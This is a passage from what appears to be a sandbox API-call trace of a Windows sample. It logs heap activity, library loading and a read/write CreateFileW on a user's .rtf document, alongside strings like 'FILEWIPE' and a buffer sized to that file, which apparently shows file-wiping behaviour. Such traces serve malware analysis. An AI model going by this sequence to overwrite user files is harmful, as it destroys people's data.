wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.802] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.802] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.805] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.805] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0178.805] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.806] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581b1190, ftCreationTime.dwHighDateTime=0x1d5ddd1, ftLastAccessTime.dwLowDateTime=0xd7475ce0, ftLastAccessTime.dwHighDateTime=0x1d5dae2, ftLastWriteTime.dwLowDateTime=0xd7475ce0, ftLastWriteTime.dwHighDateTime=0x1d5dae2, nFileSizeHigh=0x0, nFileSizeLow=0xa052, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="1usRK9.rtf", cAlternateFileName="")) returned 0x90ae18 [0178.806] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0178.806] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.806] CharLowerBuffW (in: lpsz="byte[41042]", cchLength=0xb | out: lpsz="byte[41042]") returned 0xb [0178.807] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.807] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0178.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.807] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0178.807] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0178.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2828 [0178.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2828, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.808] FreeLibrary (hLibModule=0x75c90000) returned 1 [0178.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0178.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.808] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0178.808] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0178.808] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0178.809] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.809] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.809] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.809] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.809] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.809] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.810] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.811] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0178.811] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0178.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0178.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd4f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0178.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\1usrk9.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0178.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd4068 | out: hHeap=0x8a0000) returned 1 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0178.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0178.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.814] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.815] 